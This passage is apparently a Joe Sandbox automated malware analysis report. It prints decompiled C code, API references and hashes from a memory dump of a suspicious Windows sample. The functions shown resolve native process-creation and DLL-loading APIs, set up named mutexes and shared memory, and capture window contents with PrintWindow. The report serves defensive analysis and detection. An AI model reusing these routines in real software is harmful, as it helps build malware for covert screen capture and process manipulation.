							ReleaseDC(0, _t220);
							if(_t227 == 0) {
								goto L30;
							}
							_t222 =  *((intOrPtr*)(_t229 + 0x58));
							_t142 = SelectObject(_t227,  *( *((intOrPtr*)(_t229 + 0x58)) + 0x1c));
							 *(_t229 + 0x2c) = _t142;
							if(_t142 != 0) {
								 *((char*)(_t229 + 0x6f)) = 1;
								if( *(_t229 + 0x28) == 0) {
									if(( *(_t229 + 0x5c) & 0x00000004) == 0) {
										if(( *(_t229 + 0x5c) & 0x00000008) == 0) {
											L58:
											SelectObject(_t227,  *(_t229 + 0x2c));
											DeleteDC(_t227);
											_t139 =  *((intOrPtr*)(_t229 + 0x6f));
											goto L59;
										}
										if( *(_t229 + 0x60) != 0 ||  *(_t229 + 0x64) != 0) {
											SetViewportOrgEx(_t227,  *(_t229 + 0x60),  *(_t229 + 0x64), 0);
										}
										_t147 = E012CDD7B(_t222, _t229 + 0x30, 0);
										__imp__PrintWindow( *(_t229 + 0x68), _t227, 0);
										if(_t147 != 0) {
											L57:
											E012CDD7B(_t222, _t229 + 0x30, 1);
										} else {
											 *((char*)(_t229 + 0x6f)) = 0;
										}
										goto L58;
									}
									if( *(_t229 + 0x60) != 0 ||  *(_t229 + 0x64) != 0) {
										SetViewportOrgEx(_t227,  *(_t229 + 0x60),  *(_t229 + 0x64), 0);
									}
									E012CDD7B(_t222, _t229 + 0x30, 0);
									DefWindowProcW( *(_t229 + 0x68), 0x317, _t227, 0xe);
									goto L57;
								}
								 *(_t229 + 0xc) =  *(_t229 + 0x68);
								 *(_t229 + 0x10) = _t227;
								 *((intOrPtr*)(_t229 + 0x1c)) =  *((intOrPtr*)(_t229 + 0x48)) -  *(_t229 + 0x40);
								 *(_t229 + 0x24) = 1;
								 *((intOrPtr*)(_t229 + 0x20)) =  *((intOrPtr*)(_t229 + 0x4c)) -  *((intOrPtr*)(_t229 + 0x44));
								 *((intOrPtr*)(_t229 + 0x14)) = 0;
								 *((intOrPtr*)(_t229 + 0x18)) = 0;
								TlsSetValue( *0x12dd83c, _t229 + 8);
								if( *(_t229 + 0x7b) == 1 && EqualRect(_t229 + 0x40, _t229 + 0x30) == 0) {
									 *(_t229 + 0x78) = SaveDC(_t227);
									if( *(_t229 + 0x60) != 0 ||  *(_t229 + 0x64) != 0) {
										SetViewportOrgEx(_t227,  *(_t229 + 0x60),  *(_t229 + 0x64), 0);
									}
									E012CDD7B( *((intOrPtr*)(_t229 + 0x58)), _t229 + 0x30, 0);
									 *(_t229 + 8) = 0;
									SendMessageW( *(_t229 + 0x68), 0x85, 1, 0);
									if( *(_t229 + 8) == 0) {
										DefWindowProcW( *(_t229 + 0x68), 0x317, _t227, 2);
									}
									E012CDD7B( *((intOrPtr*)(_t229 + 0x58)), _t229 + 0x30, 1);
									RestoreDC(_t227,  *(_t229 + 0x78));
								}
								if( *(_t229 + 0x7f) != 1) {
									L51:
									TlsSetValue( *0x12dd83c, 0);
									goto L58;
								} else {
									if( *(_t229 + 0x50) != 0) {
										L43:
										 *(_t229 + 0x7f) = 1;
										L44:
										 *(_t229 + 0x78) = SaveDC(_t227);
										if( *(_t229 + 0x7f) != 0) {
											SetViewportOrgEx(_t227,  *(_t229 + 0x50),  *(_t229 + 0x54), 0);
										}
										E012CDD7B( *((intOrPtr*)(_t229 + 0x58)), _t229 + 0x40, 0);
										_t165 = SendMessageW( *(_t229 + 0x68), 0x14, _t227, 0);
										asm("sbb eax, eax");
										 *(_t229 + 0x24) =  ~_t165 + 1;
										RestoreDC(_t227,  *(_t229 + 0x78));
										if( *(_t229 + 0x7f) != 0) {
											SetViewportOrgEx(_t227,  *(_t229 + 0x50),  *(_t229 + 0x54), 0);
										}
										 *(_t229 + 8) = 0;
										SendMessageW( *(_t229 + 0x68), 0xf, 0, 0);
										if( *(_t229 + 8) == 0) {
											DefWindowProcW( *(_t229 + 0x68), 0x317, _t227, 4);
										}
										E012CDD7B( *((intOrPtr*)(_t229 + 0x58)), _t229 + 0x40, 1);
										goto L51;
									}
									 *(_t229 + 0x7f) = 0;
									if( *(_t229 + 0x54) == 0) {
										goto L44;
									}
									goto L43;
								}
							}
							DeleteDC(_t227);
							goto L30;
						} else {
							_t139 = 1;
							L59:
							goto L60;
						}
					} else {
						_t139 = 0;
						L60:
						goto L61;
					}
				} else {
					_t139 = 1;
					L61:
					return _t139;
				}
			}

0x012cde5d
0x012cde5e
0x012cde68
0x012cde6d
0x012cde75
0x012cde78
0x012cde7d
0x012cde8c
0x012cde8e
0x012cde95
0x012cde95
0x012cde9b
0x012cdea9
0x012cdea9
0x012cdeb3
0x012cdeb6
0x012cdeb9
0x012cdebc
0x012cdebf
0x012cdece
0x012cded8
0x012cdeef
0x012cdef2
0x012cdef7
0x012cdef9
0x012cdefc
0x012cdf01
0x012cdf05
0x012cdf05
0x012cdf08
0x012cdf0a
0x012cdf0f
0x012cdf13
0x012cdf13
0x012cdf0f
0x012cdf19
0x012cdf1c
0x012cdf1f
0x012cdf64
0x012cdf21
0x012cdf28
0x012cdf3c
0x012cdf43
0x012cdf45
0x012cdf48
0x012cdf4d
0x012cdf51
0x012cdf51
0x012cdf54
0x012cdf56
0x012cdf5b
0x012cdf5f
0x012cdf5f
0x012cdf5b
0x012cdf2a
0x012cdf2a
0x012cdf2a
0x012cdf28
0x012cdf6a
0x012cdf7f
0x012cdf83
0x012cdfb5
0x012cdfb5
0x00000000
0x012cdfb5
0x012cdf8e
0x012cdf90
0x012cdf98
0x00000000
0x00000000
0x012cdf9a
0x012cdfa1
0x012cdfa7
0x012cdfac
0x012cdfbc
0x012cdfc4
0x012ce13f
0x012ce1a3
0x012ce181
0x012ce185
0x012ce18c
0x012ce192
0x00000000
0x012ce192
0x012ce1a8
0x012ce1b7
0x012ce1b7
0x012ce1c3
0x012ce1cd
0x012ce1d5
0x012ce175
0x012ce17c
0x012ce1d7
0x012ce1d7
0x012ce1d7
0x00000000
0x012ce1d5
0x012ce144
0x012ce153
0x012ce153
0x012ce15f
0x012ce16f
0x00000000
0x012ce16f
0x012cdfcd
0x012cdfd6
0x012cdfd9
0x012cdfe2
0x012cdfe9
0x012cdff6
0x012cdff9
0x012cdffc
0x012ce00c
0x012ce027
0x012ce02d
0x012ce03c
0x012ce03c
0x012ce049
0x012ce059
0x012ce05c
0x012ce061
0x012ce06e
0x012ce06e
0x012ce07c
0x012ce085
0x012ce085
0x012ce08f
0x012ce12c
0x012ce133
0x00000000
0x012ce095
0x012ce098
0x012ce0a2
0x012ce0a2
0x012ce0a6
0x012ce0ad
0x012ce0b3
0x012ce0bd
0x012ce0bd
0x012ce0ca
0x012ce0d6
0x012ce0dd
0x012ce0e1
0x012ce0e4
0x012ce0ed
0x012ce0f7
0x012ce0f7
0x012ce104
0x012ce107
0x012ce10c
0x012ce119
0x012ce119
0x012ce127
0x00000000
0x012ce127
0x012ce09a
0x012ce0a0
0x00000000
0x00000000
0x00000000
0x012ce0a0
0x012ce08f
0x012cdfaf
0x00000000
0x012cdf71
0x012cdf71
0x012ce195
0x00000000
0x012ce196
0x012cded0
0x012cded0
0x012ce197
0x00000000
0x012ce197
0x012cde7f
0x012cde7f
0x012ce198
0x012ce19c
0x012ce19c

APIs

GetWindowInfo.USER32 ref: 012CDEC6
SelectObject.GDI32(00000000,?), ref: 012CE185
DeleteDC.GDI32(00000000), ref: 012CE18C
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 012CE1B7
PrintWindow.USER32(?,00000000,00000000), ref: 012CE1CD

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: Window$DeleteInfoObjectPrintSelectViewport
String ID:
API String ID: 1799956499-0
Opcode ID: 8ca158e39bf73f4d9dc85065a02bab8ec75b063338a06480a8cf573dd0f721d4
Instruction ID: 081846f6af0ad465e94d44895ed00aa2e55a814d917ec4cb944f7c9e360684f0
Opcode Fuzzy Hash: 8ca158e39bf73f4d9dc85065a02bab8ec75b063338a06480a8cf573dd0f721d4
Instruction Fuzzy Hash: 0DC1447281228EEBDF229FA8DC889ED3FA9BF09740F05012DFB4596251D775C841CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 012C1097 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 86
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E012C1097(void* __edi, signed int _a4) {
				short _v24;
				intOrPtr _t6;
				void* _t7;
				void* _t8;
				struct HINSTANCE__* _t9;
				void* _t10;
				struct HINSTANCE__* _t13;
				_Unknown_base(*)()* _t19;
				struct HINSTANCE__* _t20;
				struct HINSTANCE__* _t23;
				void* _t24;
				intOrPtr _t29;

				_t6 = L012B1B95();
				 *0x12dc750 = _t6;
				if(_t6 != 0) {
					__eflags = _a4 & 0x00000001;
					if((_a4 & 0x00000001) != 0) {
						_push(__edi);
						_t7 = E012C0F86(_t6, "GetProcAddress");
						_t29 =  *0x12dc750; // 0x76670000
						_t8 = E012C0F86(_t29, "LoadLibraryA");
						_t23 =  *0x12dc74c; // 0x12b0000
						_t9 = L012B149C(_t23, _t8, _t7);
						__eflags = _t9;
						if(_t9 == 0) {
							L4:
							_t10 = 0;
							__eflags = 0;
							L5:
							return _t10;
						}
						L8:
						_t24 = 0x73;
						L012B1479(_t24,  &_v24);
						_t13 = GetModuleHandleW( &_v24);
						 *0x12dc754 = _t13;
						__eflags = _t13;
						if(_t13 == 0) {
							goto L4;
						}
						 *0x12dc7b0 = GetProcAddress(_t13, "NtCreateThread");
						 *0x12dc7b4 = GetProcAddress( *0x12dc754, "NtCreateUserProcess");
						 *0x12dc7b8 = GetProcAddress( *0x12dc754, "NtQueryInformationProcess");
						 *0x12dc7bc = GetProcAddress( *0x12dc754, "RtlUserThreadStart");
						 *0x12dc7c0 = GetProcAddress( *0x12dc754, "LdrLoadDll");
						_t19 = GetProcAddress( *0x12dc754, "LdrGetDllHandle");
						 *0x12dc7c4 = _t19;
						__eflags =  *0x12dc7b0; // 0x770f99e0
						if(__eflags != 0) {
							L11:
							__eflags =  *0x12dc7b8; // 0x770f9670
							if(__eflags == 0) {
								goto L4;
							}
							__eflags =  *0x12dc7c0; // 0x770c7840
							if(__eflags == 0) {
								goto L4;
							}
							__eflags = _t19;
							if(_t19 == 0) {
								goto L4;
							}
							_t10 = 1;
							goto L5;
						}
						__eflags =  *0x12dc7b4; // 0x770fa120
						if(__eflags == 0) {
							goto L4;
						}
						goto L11;
					}
					_t20 = GetModuleHandleW(0);
					 *0x12dc74c = _t20;
					__eflags = _t20;
					if(_t20 != 0) {
						goto L8;
					}
					goto L4;
				}
				return 0;
			}

0x012c109e
0x012c10a5
0x012c10ac
0x012c10b2
0x012c10bd
0x012c10d3
0x012c10db
0x012c10e0
0x012c10ec
0x012c10f1
0x012c10f9
0x012c10ff
0x012c1101
0x012c10cb
0x012c10cb
0x012c10cb
0x012c10cd
0x00000000
0x012c10cd
0x012c1103
0x012c1108
0x012c1109
0x012c1112
0x012c1114
0x012c1119
0x012c111b
0x00000000
0x00000000
0x012c1136
0x012c1148
0x012c115a
0x012c116c
0x012c117e
0x012c1183
0x012c1185
0x012c118a
0x012c1190
0x012c119e
0x012c119e
0x012c11a4
0x00000000
0x00000000
0x012c11aa
0x012c11b0
0x00000000
0x00000000
0x012c11b6
0x012c11b8
0x00000000
0x00000000
0x012c11be
0x00000000
0x012c11be
0x012c1192
0x012c1198
0x00000000
0x00000000
0x00000000
0x012c1198
0x012c10c0
0x012c10c2
0x012c10c7
0x012c10c9
0x00000000
0x00000000
0x00000000
0x012c10c9
0x00000000

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 012C10C0
GetModuleHandleW.KERNEL32(?,00000000,GetProcAddress), ref: 012C1112
GetProcAddress.KERNEL32(00000000,NtCreateThread), ref: 012C1129
GetProcAddress.KERNEL32(NtCreateUserProcess), ref: 012C113B
GetProcAddress.KERNEL32(NtQueryInformationProcess), ref: 012C114D
GetProcAddress.KERNEL32(RtlUserThreadStart), ref: 012C115F
GetProcAddress.KERNEL32(LdrLoadDll), ref: 012C1171
GetProcAddress.KERNEL32(LdrGetDllHandle), ref: 012C1183

Strings

LdrLoadDll, xrefs: 012C1161
GetProcAddress, xrefs: 012C10D4
LoadLibraryA, xrefs: 012C10E7
NtQueryInformationProcess, xrefs: 012C113D
RtlUserThreadStart, xrefs: 012C114F
LdrGetDllHandle, xrefs: 012C1173
NtCreateUserProcess, xrefs: 012C112B
NtCreateThread, xrefs: 012C1123

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: GetProcAddress$LdrGetDllHandle$LdrLoadDll$LoadLibraryA$NtCreateThread$NtCreateUserProcess$NtQueryInformationProcess$RtlUserThreadStart
API String ID: 667068680-305303173
Opcode ID: 41aab72d42e7056ae2f5876b624e3baeb0f98852f889005d78d25f91229a9803
Instruction ID: 4aa3526e78ef7277e93ca9afcc38447a0452f0821384102e06c569ed8631397f
Opcode Fuzzy Hash: 41aab72d42e7056ae2f5876b624e3baeb0f98852f889005d78d25f91229a9803
Instruction Fuzzy Hash: 9E218071F26352DAEB38AF75F99D8663FEDE604A443020A2FDB0093109D7784028CF91

Uniqueness

Uniqueness Score: -1.00%

Function 012CEB9B Relevance: 24.2, APIs: 16, Instructions: 191
registrymemorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E012CEB9B(void** __esi, char _a4) {
				char _v5;
				struct HDC__* _v12;
				char _v16;
				short _v116;
				char _v524;
				char _v536;
				void* _v546;
				char _v1024;
				long _t57;
				int _t60;
				void* _t63;
				char _t64;
				void* _t67;
				void* _t70;
				void* _t71;
				struct HDC__* _t73;
				signed char _t79;
				signed int _t81;
				void* _t93;
				struct HDC__* _t95;
				void* _t97;
				void* _t98;
				struct HDC__* _t126;
				void** _t127;

				_t127 = __esi;
				L012B19F6(__esi, 0x18c);
				_t57 = TlsAlloc();
				__esi[1] = _t57;
				if(_t57 == 0xffffffff) {
					return 0;
				}
				L012B137F(0x84889911,  &_v116, 0);
				_t60 = RegisterWindowMessageW( &_v116);
				__esi[2] = _t60;
				if(_t60 != 0) {
					L012B137F(0x84889912,  &_v116, 1);
					_t63 = CreateEventW(0x12dc7c8, 1, 0,  &_v116);
					__esi[3] = _t63;
					if(_t63 == 0) {
						L14:
						_t64 = 0;
						L22:
						goto L23;
					}
					L012B137F(0x18782822,  &_v116, 1);
					_t67 = CreateMutexW(0x12dc7c8, 0,  &_v116);
					__esi[5] = _t67;
					if(_t67 == 0) {
						goto L14;
					}
					L012B137F(0x9878a222,  &_v116, 1);
					_t70 = CreateFileMappingW(0, 0x12dc7c8, 4, 0, 0x3d09128,  &_v116);
					 *__esi = _t70;
					if(_t70 == 0) {
						goto L14;
					}
					_t71 = MapViewOfFile(_t70, 2, 0, 0, 0);
					if(_t71 == 0) {
						goto L14;
					}
					__esi[4] = _t71;
					__esi[6] = _t71 + 0x128;
					_v5 = 0;
					_t73 = GetDC(0);
					_v12 = _t73;
					if(_t73 == 0) {
						L21:
						_t64 = _v5;
						goto L22;
					}
					__esi[9] = 0;
					__esi[0xa] = 0;
					__esi[0xb] = GetDeviceCaps(_t73, 8);
					__esi[0xc] = GetDeviceCaps(_v12, 0xa);
					__esi[7] = L012B1235(_v12, __esi[0xb], _t75,  &_v16,  &(__esi[8]), 0, 0);
					ReleaseDC(0, _v12);
					if(__esi[7] == 0) {
						goto L21;
					}
					_t112 = _v16;
					_t79 =  *(_v16 + 0xe) >> 3;
					__esi[0xe] = _t79;
					_t81 = (_t79 & 0x000000ff) * __esi[0xb];
					__esi[0xd] = _t81;
					if((_t81 & 0x00000003) != 0) {
						_t81 = (_t81 & 0xfffffffc) + 4;
					}
					_t127[0xd] = _t81;
					L012B1933(_t112);
					_v5 = 1;
					if(_a4 != 1) {
						goto L21;
					} else {
						_v5 = 0;
						L012B16B3( &_v536);
						L012B11AE( &_v1024);
						L012B1947( &(_t127[0xf]), 0x12dca08, 0x10);
						_t127[0x13] = _v546;
						L012B1947( &(_t127[0x14]),  &_v524, 0x102);
						L012B137F(0x1898b122,  &_v116, 1);
						_t93 = CreateMutexW(0x12dc7c8, 0,  &_v116);
						_t127[0x58] = _t93;
						if(_t93 != 0) {
							_t126 = GetDC(0);
							if(_t126 == 0) {
								goto L21;
							}
							_t95 = CreateCompatibleDC(_t126);
							_t127[0x55] = _t95;
							if(_t95 != 0) {
								_t97 = CreateCompatibleBitmap(_t126, 1, 1);
								_t127[0x57] = _t97;
								if(_t97 != 0) {
									_t98 = SelectObject(_t127[0x55], _t97);
									_t127[0x56] = _t98;
									if(_t98 != 0) {
										_v5 = 1;
									}
								}
							}
							ReleaseDC(0, _t126);
							goto L21;
						}
						goto L14;
					}
				} else {
					_t64 = 0;
					L23:
					return _t64;
				}
			}

0x012ceb9b
0x012cebab
0x012cebb0
0x012cebb6
0x012cebbc
0x00000000
0x012cebbe
0x012cebd1
0x012cebda
0x012cebe0
0x012cebe5
0x012cebf9
0x012cec0b
0x012cec11
0x012cec16
0x012ced93
0x012ced93
0x012cedf0
0x00000000
0x012cedf0
0x012cec26
0x012cec31
0x012cec37
0x012cec3c
0x00000000
0x00000000
0x012cec4c
0x012cec5f
0x012cec65
0x012cec69
0x00000000
0x00000000
0x012cec75
0x012cec7d
0x00000000
0x00000000
0x012cec83
0x012cec8c
0x012cec8f
0x012cec92
0x012cec98
0x012cec9d
0x012ceded
0x012ceded
0x00000000
0x012ceded
0x012ceca6
0x012ceca9
0x012cecb7
0x012cecd1
0x012cecdc
0x012cece0
0x012cece9
0x00000000
0x00000000
0x012cecef
0x012cecf6
0x012cecfa
0x012ced00
0x012ced04
0x012ced09
0x012ced0e
0x012ced0e
0x012ced11
0x012ced14
0x012ced1d
0x012ced21
0x00000000
0x012ced27
0x012ced2d
0x012ced30
0x012ced3b
0x012ced4b
0x012ced56
0x012ced69
0x012ced78
0x012ced83
0x012ced89
0x012ced91
0x012ced9e
0x012ceda2
0x00000000
0x00000000
0x012ceda5
0x012cedab
0x012cedb3
0x012cedba
0x012cedc0
0x012cedc8
0x012cedd1
0x012cedd7
0x012ceddf
0x012cede1
0x012cede1
0x012ceddf
0x012cedc8
0x012cede7
0x00000000
0x012cede7
0x00000000
0x012ced91
0x012cebe7
0x012cebe7
0x012cedf1
0x00000000
0x012cedf1

APIs

TlsAlloc.KERNEL32 ref: 012CEBB0
RegisterWindowMessageW.USER32(?,00000000), ref: 012CEBDA

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: AllocMessageRegisterWindow
String ID:
API String ID: 339627511-0
Opcode ID: 8e21b35a6025d72ca13a3161ebeea9741df9f050df8c6f99673925c49d46f3c7
Instruction ID: 445bceef73085f6d194b3ea75c96855b6bb530918c7d242a49fd0d0cb00c47e6
Opcode Fuzzy Hash: 8e21b35a6025d72ca13a3161ebeea9741df9f050df8c6f99673925c49d46f3c7
Instruction Fuzzy Hash: 3F619C75910745AFDB20AFB4DC88AAEBBBCFB18700F144A2DE242D7641EB75A545CB20

Uniqueness

Uniqueness Score: -1.00%

Function 012C1FF5 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 191
sleepstringsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E012C1FF5(void* __eflags) {
				WCHAR* _t54;
				void* _t62;
				void* _t65;
				char _t66;
				void* _t73;
				intOrPtr* _t81;
				void* _t84;
				intOrPtr _t96;
				WCHAR* _t109;
				void* _t125;
				signed int _t139;
				signed int _t141;
				void* _t142;
				void* _t148;
				void* _t150;
				void* _t152;

				_t150 = _t152 - 0x74;
				_push(_t139);
				 *((char*)(_t150 + 0x73)) = 0;
				 *((intOrPtr*)(_t150 + 0x6c)) = 0;
				_t54 = L012B175D(0xff);
				_t144 = _t54;
				lstrcpyW(_t54,  *0x12dc7ec);
				_t125 = 0x5c;
				 *((short*)(L012B1ABE(_t54, _t125) + 2)) = 0;
				L012B101E(_t54, 6);
				if(L012B16AE(_t144, _t150 + 0x50, 0) != 0) {
					 *((intOrPtr*)(_t150 + 0x6c)) =  *((intOrPtr*)(_t150 + 0x54));
					_t96 = L012B1465( *((intOrPtr*)(_t150 + 0x50)), _t150 + 0x6c);
					 *((intOrPtr*)(_t150 + 0x5c)) = _t96;
					if(_t96 == 0) {
						 *((intOrPtr*)(_t150 + 0x6c)) = 0;
					}
					L012B1406(_t150 + 0x50);
				}
				L012B1933(_t144);
				if( *((intOrPtr*)(_t150 + 0x6c)) != 0x1e6) {
					if( *((intOrPtr*)(_t150 + 0x6c)) != 0) {
						L33:
						L012B1933( *((intOrPtr*)(_t150 + 0x5c)));
						return  *((intOrPtr*)(_t150 + 0x73));
					}
					_t62 = L012B1780(0x8889347b, 2);
					 *(_t150 + 0x68) = _t62;
					if(_t62 == 0) {
						L31:
						if( *((char*)(_t150 + 0x7c)) == 1) {
							_t109 =  *0x12dc7ec; // 0x0
							L012B1483(_t109);
						}
						goto L33;
					}
					L012B137F(0x19367401, _t150 - 0x24, 1);
					_t65 = L012B14EC(_t150 - 0x24);
					_t141 = _t139 | 0xffffffff;
					if(_t65 == 0) {
						L22:
						_t66 = L012B1609(0x12dc7f0, _t150 - 0x2a0);
						 *((char*)(_t150 + 0x73)) = _t66;
						if(_t66 == 1) {
							 *((char*)(_t150 + 0x73)) = L012B166D(_t150 - 0x2a0, 0, 0x12dc7f0, 0, _t150 + 0x40) != 0;
							if( *((intOrPtr*)(_t150 + 0x73)) != 0) {
								L012B137F(0x1a43533f, _t150 - 0x24, 1);
								 *(_t150 + 0x60) = CreateEventW(0x12dc7c8, 1, 0, _t150 - 0x24);
								_t73 =  *(_t150 + 0x40);
								 *(_t150 + 0x64) = _t73;
								_push(_t141);
								if( *(_t150 + 0x60) != 0) {
									WaitForMultipleObjects(2, _t150 + 0x60, 0, ??);
								} else {
									WaitForSingleObject(_t73, ??);
								}
								if( *(_t150 + 0x60) != 0) {
									CloseHandle( *(_t150 + 0x60));
								}
								CloseHandle( *(_t150 + 0x44));
								CloseHandle( *(_t150 + 0x40));
							}
						}
						L012B1492( *(_t150 + 0x68));
						goto L31;
					}
					_t148 = GetFileAttributesExW;
					while(L012B14E7(_t141, _t148) == 0) {
						Sleep(0x1f4);
					}
					goto L22;
				}
				_t81 = 0x12dc76c;
				do {
					 *((intOrPtr*)(_t81 - 0x14)) = 0;
					 *_t81 = 0;
					_t81 = _t81 + 4;
				} while (_t81 < 0x12dc780);
				if(L012B1AFA( *((intOrPtr*)(_t150 + 0x5c)), 0x1e6) != 0) {
					L012B137F(0x32901130, _t150 - 0x24, 1);
					_t84 = L012B177B(0x12dc7c8, _t150 - 0x24);
					 *(_t150 + 0x68) = _t84;
					if(_t84 != 0) {
						L012B170D(_t150 - 0x98);
						if(( *(_t150 - 0x98) & 0x00000020) != 0) {
							 *0x12dc738 =  *0x12dc738 | 0x00000010;
						}
						L012B17CB();
						if(( *0x12dc738 & 0x00000010) != 0) {
							E012C1A81();
						}
						_t137 = _t150 - 0x24;
						L012B137F(0x1a43533f, _t150 - 0x24, 1);
						_t142 = OpenEventW(2, 0, _t150 - 0x24);
						if(_t142 != 0) {
							SetEvent(_t142);
							CloseHandle(_t142);
						}
						L012B15A5(1, _t137);
						 *((char*)(_t150 + 0x73)) = 1;
						CloseHandle( *(_t150 + 0x68));
					}
				}
				goto L33;
			}

0x012c1ff6
0x012c2004
0x012c200a
0x012c200d
0x012c2010
0x012c201b
0x012c201e
0x012c2026
0x012c2030
0x012c203d
0x012c204f
0x012c205a
0x012c205d
0x012c2062
0x012c2067
0x012c2069
0x012c2069
0x012c206f
0x012c206f
0x012c2076
0x012c2083
0x012c214c
0x012c2257
0x012c225a
0x012c2269
0x012c2269
0x012c2159
0x012c215e
0x012c2163
0x012c2246
0x012c224a
0x012c224c
0x012c2252
0x012c2252
0x00000000
0x012c224a
0x012c2173
0x012c217b
0x012c2180
0x012c2185
0x012c21a7
0x012c21b4
0x012c21b9
0x012c21be
0x012c21d5
0x012c21dc
0x012c21e8
0x012c21ff
0x012c2202
0x012c2205
0x012c2208
0x012c220c
0x012c221e
0x012c220e
0x012c220f
0x012c220f
0x012c222d
0x012c2232
0x012c2232
0x012c2237
0x012c223c
0x012c223c
0x012c21dc
0x012c2241
0x00000000
0x012c2241
0x012c2187
0x012c219a
0x012c2194
0x012c2194
0x00000000
0x012c219a
0x012c2089
0x012c208e
0x012c208e
0x012c2091
0x012c2093
0x012c2096
0x012c20a7
0x012c20b7
0x012c20c4
0x012c20c9
0x012c20ce
0x012c20da
0x012c20e6
0x012c20e8
0x012c20e8
0x012c20ef
0x012c20fb
0x012c20fd
0x012c20fd
0x012c2104
0x012c210c
0x012c2124
0x012c2128
0x012c212b
0x012c2132
0x012c2132
0x012c2136
0x012c213e
0x012c2142
0x012c2142
0x012c20ce
0x00000000

APIs

lstrcpyW.KERNEL32 ref: 012C201E
OpenEventW.KERNEL32(00000002,00000000,?,00000001,00000001,00000000,00000006,?,?,00000000), ref: 012C2118
SetEvent.KERNEL32(00000000,?,?,00000000), ref: 012C212B
CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 012C2132
CloseHandle.KERNEL32(?,?,?,00000000), ref: 012C2142
Sleep.KERNEL32(000001F4,00000001,00000000,00000006,?,?,00000000), ref: 012C2194
CreateEventW.KERNEL32(012DC7C8,00000001,00000000,?,00000001,?,012DC7F0,00000000,?,00000001,00000000,00000006,?,?,00000000), ref: 012C21F9
WaitForSingleObject.KERNEL32(?,?,?,?,00000000), ref: 012C220F
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,?,?,?,00000000), ref: 012C221E
CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 012C2232
CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 012C2237
CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 012C223C

Strings

o.d, xrefs: 012C2036

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: CloseHandle$Event$Wait$CreateMultipleObjectObjectsOpenSingleSleeplstrcpy
String ID: o.d
API String ID: 3864132990-4245879138
